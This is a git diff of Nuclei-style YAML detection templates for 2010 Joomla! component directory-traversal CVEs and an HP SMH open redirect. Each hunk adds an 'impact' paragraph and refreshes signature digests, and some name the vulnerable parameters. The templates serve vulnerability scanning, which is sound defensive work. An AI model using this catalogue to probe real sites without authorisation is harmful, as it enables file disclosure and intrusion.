-# digest: 4a0a00473045022100d7ecff15693dcc6ba114f6d0d873f07201f187f4caf25f0e5358e6c48f3a158d022056dbab57d855141513e2fd556ceb44f45df93528c1af8d2aacfa57015bd86945:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a968e604f3d5eb04a9d0d2b89e3a82a0abfaf1175bdac3d8cc895972c44b442b02201c5bbbefc7883b0bc96f5ffc6096d834707dcc79a31426f6d0a8f90c0c5394d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml
index ef7afa0bb4..e41af7fe09 100644
--- a/http/cves/2010/CVE-2010-1473.yaml
+++ b/http/cves/2010/CVE-2010-1473.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12171
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d8b5aff97935929d851f2dd64b4d5f439dbb135651412c45bda3b4d3cecfa09d022100b691dfb257d7493f6f77958108d5ff0293326faf008105be0505feccb6dd50b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202e2f5d6ac3b345ee3cfa7384339109d6498d73396a041237ba62f85526c5755b022100a131f30562e84b03ddfb91b97024de09c91c88583778ffeeeb1feb0787c279c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml
index 466d0d3096..a14291eb9c 100644
--- a/http/cves/2010/CVE-2010-1474.yaml
+++ b/http/cves/2010/CVE-2010-1474.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204dfe9e502a57e3e916593caf6ae1ab12d5cfe1a70bee11c5af267d6697516c9a02201c43a3e7c17e20f7e27061439acf0f3149516160d37295a7b5c0a3fccea39819:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203fac14474eded012145b6cc5d2952b23724d33d7a6533cb251a4ff33a6a7403e022046a06cd61e75005c10d20e74a8989cb3b5b7b7279333ef5743ec00241aa04eef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml
index c92a9af787..ff03ca3d3b 100644
--- a/http/cves/2010/CVE-2010-1475.yaml
+++ b/http/cves/2010/CVE-2010-1475.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
   remediation: |
     Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220347d65e25b5cbb302e9d5c17cd657658391d5a8a0a9af81cedbcba316b32f27c02204a31659e2975ec31b519c73c1528294a159f14bcacbe2d810dfd611310873822:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205121f2e892c037b7ac973a0080003faa18a9c705a9a025279a23a5942b4a362902204df0392cc98a96774f98772e99e110f26e6e3a2afc572f453bffd4305d0d6e90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml
index 52de1efe20..814bae2adc 100644
--- a/http/cves/2010/CVE-2010-1476.yaml
+++ b/http/cves/2010/CVE-2010-1476.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12150
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a2269cd1a53c24c6af0a68b496ff1b58b824e0d9255746297ae1f3504c06c090022013fd2262d9d0190dbfb2d6ccd01eb44c559b7f073d64df1c96f40717e864d8e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d5417a03479c8004cc8a34cbb7abdbe70cdd7a851a528792d72560c471d52e8e022013f0d023748d6b1e1c3bf7582cc10d8f230a60aa0f03d58a4cb5ace89cccbc52:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml
index 7505906626..0aff8845de 100644
--- a/http/cves/2010/CVE-2010-1478.yaml
+++ b/http/cves/2010/CVE-2010-1478.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12145
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022071fef327ece73af4e957ebdacb2f283ddcf0666206beeb7d6e7675bff6a4a680022100b2eb72abc7691d8444931c4c42bdda1bfb8cfcf31a3d52d5dc9e360e39f8e311:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008141ca5c007f7e8cef45d147c64118c92755dbe18bad5efacb93ba4bee5f784102205acdbd62f9d1e6b512ddc3f4ce80f249330376fad2ddac92fd2968cbf1090103:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml
index 077829d7d2..7ee62cea87 100644
--- a/http/cves/2010/CVE-2010-1491.yaml
+++ b/http/cves/2010/CVE-2010-1491.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12318
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210099c131a4be3b851face18f6292bd13bac9b76ebf6a9575080d389fba020855fa0221009d80872f5b43b6ac579ed968ef752215290aa43a8fdb5febb7d322d300ee2cec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d829381add883dd1d5af538546bab9cfd00e470a806b5543ae8731c1621a8395022100f8dc253e35b6cc1342ee3b3a5e3f8292439de7542ef702b51140cc83fcf147df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml
index 21dc944764..c8ed5a3eba 100644
--- a/http/cves/2010/CVE-2010-1494.yaml
+++ b/http/cves/2010/CVE-2010-1494.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12113
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d3eaa3e347e6a2d8632599d435f90a88248f4c5f70d0bbce63138bf06521ec98022064c5ce2112150b47e8ed672aeb937f6a4a7518a2ea6eb7e8aa6f24a41f936c52:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009ba34cfc30e2696d2f60567dfda7a22293776c64a3fec9689f2b5d44e69b7da5022055c4c0938d9a9cee5e650c746792770cdfe8bdbb9584093dc0247acb1cafa355:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml
index 2d04ebc424..94e5906378 100644
--- a/http/cves/2010/CVE-2010-1495.yaml
+++ b/http/cves/2010/CVE-2010-1495.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12286
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c10fbc9874082966906af3524ab31606fcf801ea2cfb768869dc213399ed866d022058fedfcd23f360fac72d00c1d9eb14e3028d75300c60dc34eda86e57744ade68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204bc942e036cac7325edc601114a5bed76a616e7848e29f355f99aaa6b41d2526022100d8473b1793386d25bc4d72b6be8233568b651c311b9c109a28847ed26c4c8b77:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml
index 2e44a95919..fbed245fbe 100644
--- a/http/cves/2010/CVE-2010-1531.yaml
+++ b/http/cves/2010/CVE-2010-1531.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12054
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220338df5544487b4a6fea12da607569bc1708ce8c61e722fb0696bd277f79f7257022018696a318d9442606410bfebb671c036c2531863bf271e432b43826e6133ca27:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204de369cdcd5642bfba5117d8bd6d580d376907887b0db877e5010bf9b7af696d022100fc299cf2a0b7049e80bc3b6c69471724da1be4f2f738b50df7815291c0cddb3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml
index 14913ecc9f..bbfb68b5b6 100644
--- a/http/cves/2010/CVE-2010-1532.yaml
+++ b/http/cves/2010/CVE-2010-1532.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12118
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c53613a3cef1c1353f982e3b54f717214b9f9be8267b9c33425391a494b15be402205d5d020b8b17c4345d34548574513a9c92152595795128aa23ee3bc0a155de9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d219bfb3f6cbf16b9e8fc5c98b899808a4e51dd967f238011fb2e021fdefe55c022100e6c92c27a313dfb2117711d107cfad86965ec2e46b2f68abcbf96a58ce448d3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml
index 2a8553275f..48855c5b76 100644
--- a/http/cves/2010/CVE-2010-1533.yaml
+++ b/http/cves/2010/CVE-2010-1533.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12142
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022068e2ec4b051f1fee79347d7820d0374c3e65526b9cdbdb42e28feeb1d6583c4c022100eb51ea517e54a8da87b3b2cc145192a026d887a530c031f7ec7a4a9e4fb97ef0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e6531faa16beb682aa96eb4b61b502041d816dd7bb5d4e27ff102cc19c33553f022100bc65f33d23e213b2505cbe37ad46be4dfdd435ac7e764407cebe193a08f4c271:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml
index ebb17a1f22..34368ce661 100644
--- a/http/cves/2010/CVE-2010-1535.yaml
+++ b/http/cves/2010/CVE-2010-1535.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b89546a3f4377ba956987cf591456cee6237129ca51ff5c62849be0868c1dae302205bd70312a251c90f0107558ca2664b3af4ed7ec2c5896f7e32cbd263ffb087dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009a1ca762268be18b1225d800ffa6847afa432024b0724f1e85f24f18b2ec1ce3022100c5bfbeeb89ead13f3b2b34b0557f86727df26bf3f33464c6d7fdfd28bc78d612:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml
index 17edebb83c..4b8bb4fcc0 100644
--- a/http/cves/2010/CVE-2010-1540.yaml
+++ b/http/cves/2010/CVE-2010-1540.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a71de48e476071ed5a83fba8a0f1bf2f987513816aa280177504a878bee962e602205f41d0579c41e5643d6410013081f30a0c5c35006b9d4b6f5734381a635feb56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009a9a56652a6b615e6dd15e8aaee28b3bc822f7a818542029ef8ba83c2df7ea1702204c46b96e486e65d2ab0bc8669738b56d4226444fb04cecc26803e7d17489c080:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml
index 32f4e6f63e..77b3cf12dc 100644
--- a/http/cves/2010/CVE-2010-1586.yaml
+++ b/http/cves/2010/CVE-2010-1586.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.
   remediation: |
     Apply the latest patches or updates provided by HP to fix the open redirect vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 490a004630440220096ee755e28cfd4b0b033c34ef6523da4772378fab56cb37f7968e0547e43f8b0220601f13af2d58faa914ab66670384d1dc19446e5dff304827d045f4a7c5f393c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022036ec89a20bfbd44d98ab6a1a972b575521992faef4f4fcded33a447ae95f003d022100a4a2c52f0bb6af88942a06e56af358752329728b51ceff63c8f00fbdbdd900a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml
index 724aa4a847..b816c6afbb 100644
--- a/http/cves/2010/CVE-2010-1601.yaml
+++ b/http/cves/2010/CVE-2010-1601.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202f8bed8ea5e690594ee1ad6e799e3bbd5cd55c73d459987d3454df7eda28cd63022100d98eadf0eec286baa287de1b3656090d60213830c083a98d0e4782d18f2d3a83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206edac5876107d5f82bf5701673a37f3855b77a2c31a6b6e7a1da22af90f3766c02200cafb34ac24bd0d1367f64014bc6727b58a6f2468d783e4c6c81a064475b7390:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml
index 6c88629fa2..58616861ae 100644
--- a/http/cves/2010/CVE-2010-1602.yaml
+++ b/http/cves/2010/CVE-2010-1602.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f478e39b58afbb9fa6409bf223c04f8d623d7eb70fd32595e8c3f26b0536aaae0220130513e188e10dcb39aa7387f309129fee2d824a97afc8d5468461613bd36d00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220290dd86db1faa992098c4b0f73c7654644b03eae53f450b35197edbf4e50fce4022100cbb7f50a7c405a13407ff912e856d09735e30d47ee3817ea21f93f440ee0b250:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml
index 498352f342..35dedf0ded 100644
--- a/http/cves/2010/CVE-2010-1603.yaml
+++ b/http/cves/2010/CVE-2010-1603.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12284
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203cf2eeccc078d88371100d37399663d39e29c9c42fd3a3c8015919d7b5693e08022100ee99dfdf9159565c59f59ec55511836ade02e0fbd95430969b12c031e9d6567a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207aecc61f14dc32fb3d52d57a02f65e6ca7fe1248d479866cc2f270ad70d2e8350220192b03370d673feadc5f0f056dbe32af6752750a5b3a6189824b373ee9942481:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml
index bda12284af..9c08e97b52 100644
--- a/http/cves/2010/CVE-2010-1607.yaml
+++ b/http/cves/2010/CVE-2010-1607.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: |
     Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202097e8ae97446ecd72d7d9e8503dd648487fe87303f6159756c65d151718d5c5022055a6373d734b67cc3b8effcd0197251720d23cf7779100c578e06c8027eb94fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c37f564e45b1a095557537556e6fc5529db3861979d9f8cc7871bf45b972789602201f14d3c585153158d6d1513c809426cdc5bf4b8cd4e579b2528bad36d980eeaa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml
index 2d178fdecb..58c66e492b 100644
--- a/http/cves/2010/CVE-2010-1653.yaml
+++ b/http/cves/2010/CVE-2010-1653.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation.
   remediation: |
     Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220785f703fa2e90058c8205c34879eee0b28e0f340d75d4b8b6e94c78c441113db02207d30d9982d3a1cc338c5985ca9853ee23ad6aeba48b55a5dff969003346b83e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022029242a7077a7b45969c4a0a50616a234fa8121b3ec50fbccf8898c87125a79c202203b5db4964669217bd6cb0595d2e58027e8dc4e1cbf3ad44f9c3c75c38876fb01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml
index f0b4ef9ce2..fc0062f4ee 100644
--- a/http/cves/2010/CVE-2010-1657.yaml
+++ b/http/cves/2010/CVE-2010-1657.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201058e656f143389fb2390812be886b40c04539f44b3c994fc5cb9a19288ec5f402204c25fdd80681b2162aa5d47d090f9dd8c668c5fa823d1a82600068a255f82362:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206b45fb3e22374f56b528d0224831a712aaa3d82734c27f64bbb830b3aae3e4270220045de48c4ef548d03f4c030408a96d3185aa9c4cc71155f433ec2297e75b8551:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml
index 08db918e6d..1df114c744 100644
--- a/http/cves/2010/CVE-2010-1658.yaml
+++ b/http/cves/2010/CVE-2010-1658.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks.
   remediation: |
     Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f3ae9fa23d2b965d99b9af2fa3e774533a6826983faeb9fe2da9f29dc8cc3c8a02205943c1cd68eb5c929f337a5bea9c49c8a512a5aec8575d2e97c4239586c58ca9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a67780f4ffb8421b4913c9bb7356d2085f6d8010c2f57544b503e3267b1a5f2b02207f4253e96686e926c8d0c5570f0a1cd5935383902fbdde47cf9482ebe68a6ad7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml
index 680159226f..92ade001f1 100644
--- a/http/cves/2010/CVE-2010-1659.yaml
+++ b/http/cves/2010/CVE-2010-1659.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: |
     Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bbcd4f5ca339848a9c25c7221083dc46b003a2599fcfaedc6aa827174686650c022100a3a3fd55af036a15c13cbc7d6185b4805ea628f9a415f2b1fc601c3d878ebfc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eab4d7279b5c617e1dc60ed807028331e0a3a20f663fcaa96d5ecace5d023deb022046c25e560476c8b53806bea5ef61a2792625e87d30bf4cc411462aaaa51f70ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml
index 2c236eee6e..b7b8c9a375 100644
--- a/http/cves/2010/CVE-2010-1717.yaml
+++ b/http/cves/2010/CVE-2010-1717.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability.
   reference:
